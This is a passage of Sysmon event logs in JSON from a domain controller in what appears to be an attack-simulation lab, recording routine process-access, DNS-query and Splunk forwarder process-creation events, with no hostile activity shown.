05:46:48.016","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1901,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:48.016\r\nSourceProcessGUID: {A837DB8D-01C6-5F25-0000-0010F1650300}\r\nSourceProcessId: 3776\r\nSourceThreadId: 3796\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-01C8-5F25-0000-0010FCC40300}\r\nTargetProcessId: 3856\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:48.016","SourceProcessGUID":"{A837DB8D-01C6-5F25-0000-0010F1650300}","SourceProcessId":"3776","SourceThreadId":"3796","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-01C8-5F25-0000-0010FCC40300}","TargetProcessId":"3856","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":1902,"ProcessID":2740,"ThreadID":3432,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.146\r\nProcessGuid: {A837DB8D-01C5-5F25-0000-00102EBE0200}\r\nProcessId: 2100\r\nQueryName: win-dc-881393\r\nQueryStatus: 0\r\nQueryResults: 10.0.1.14;\r\nImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.146","ProcessGuid":"{A837DB8D-01C5-5F25-0000-00102EBE0200}","QueryName":"win-dc-881393","QueryStatus":"0","QueryResults":"10.0.1.14;","Image":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","EventReceivedTime":"2020-08-01 05:46:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":1903,"ProcessID":2740,"ThreadID":3432,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.522\r\nProcessGuid: {A837DB8D-01C5-5F25-0000-001066B80200}\r\nProcessId: 2748\r\nQueryName: win-dc-881393.attackrange.local\r\nQueryStatus: 0\r\nQueryResults: fe80::3413:3332:6143:4f60;::ffff:10.0.1.14;\r\nImage: C:\\Windows\\ADWS\\Microsoft.ActiveDirectory.WebServices.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.522","ProcessGuid":"{A837DB8D-01C5-5F25-0000-001066B80200}","QueryName":"win-dc-881393.attackrange.local","QueryStatus":"0","QueryResults":"fe80::3413:3332:6143:4f60;::ffff:10.0.1.14;","Image":"C:\\Windows\\ADWS\\Microsoft.ActiveDirectory.WebServices.exe","EventReceivedTime":"2020-08-01 05:46:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":1904,"ProcessID":2740,"ThreadID":3432,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.523\r\nProcessGuid: {A837DB8D-01B3-5F25-0000-001001540000}\r\nProcessId: 864\r\nQueryName: win-dc-881393\r\nQueryStatus: 0\r\nQueryResults: 10.0.1.14;\r\nImage: C:\\Windows\\System32\\lsass.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.523","ProcessGuid":"{A837DB8D-01B3-5F25-0000-001001540000}","QueryName":"win-dc-881393","QueryStatus":"0","QueryResults":"10.0.1.14;","Image":"C:\\Windows\\System32\\lsass.exe","EventReceivedTime":"2020-08-01 05:46:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1905,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:48.250\r\nSourceProcessGUID: {A837DB8D-01C8-5F25-0000-0010FCC40300}\r\nSourceProcessId: 3856\r\nSourceThreadId: 3852\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-0010C3C30200}\r\nTargetProcessId: 3088\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f344c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f2a91|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+19fdb50|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:48.250","SourceProcessGUID":"{A837DB8D-01C8-5F25-0000-0010FCC40300}","SourceProcessId":"3856","SourceThreadId":"3852","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-0010C3C30200}","TargetProcessId":"3088","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f344c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f2a91|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+19fdb50|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1906,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:48.250\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C8-5F25-0000-0010FCC40300}\r\nTargetProcessId: 3856\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:48.250","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C8-5F25-0000-0010FCC40300}","TargetProcessId":"3856","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":1907,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:48.298\r\nProcessGuid: {A837DB8D-01C8-5F25-0000-001028D00300}\r\nProcessId: 4064\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nFileVersion: 8.0.2\r\nDescription: btool\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: btool.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool\" check --no-log\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B\r\nParentProcessGuid: {A837DB8D-01C7-5F25-0000-001075BD0300}\r\nParentProcessId: 3736\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\"  _internal pre-flight-checks --answer-yes --no-prompt ","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:46:48.298","ProcessGuid":"{A837DB8D-01C8-5F25-0000-001028D00300}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","FileVersion":"8.0.2","Description":"btool","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"btool.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool\" check --no-log","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B","ParentProcessGuid":"{A837DB8D-01C7-5F25-0000-001075BD0300}","ParentProcessId":"3736","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\"  _internal pre-flight-checks --answer-yes --no-prompt ","EventReceivedTime":"2020-08-01 05:46:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1908,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:48.297\r\nSourceProcessGUID: {A837DB8D-01C7-5F25-0000-001075BD0300}\r\nSourceProcessId: 3736\r\nSourceThreadId: 3716\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nTargetProcessGUID: {A837DB8D-01C8-5F25-0000-001028D00300}\r\nTargetProcessId: 4064\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4022c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+403f8|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+404c7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+40fee|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+13671|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+1815e|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+1adfc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4cf68|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:48.297","SourceProcessGUID":"{A837DB8D-01C7-5F25-0000-001075BD0300}","SourceProcessId":"3736","SourceThreadId":"3716","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","TargetProcessGUID":"{A837DB8D-01C8-5F25-0000-001028D00300}","TargetProcessId":"4064","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4022c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+403f8|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+404c7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+40fee|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+13671|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+1815e|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+1adfc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4cf68|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1909,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:48.297\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-01C8-5F25-0000-001028D00300}\r\nTargetProcessId: 4064\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:48.297","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-01C8-5F25-0000-001028D00300}","TargetProcessId":"4064","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:46:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1910,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:48.297\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:48.297","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1911,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:48.297\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: 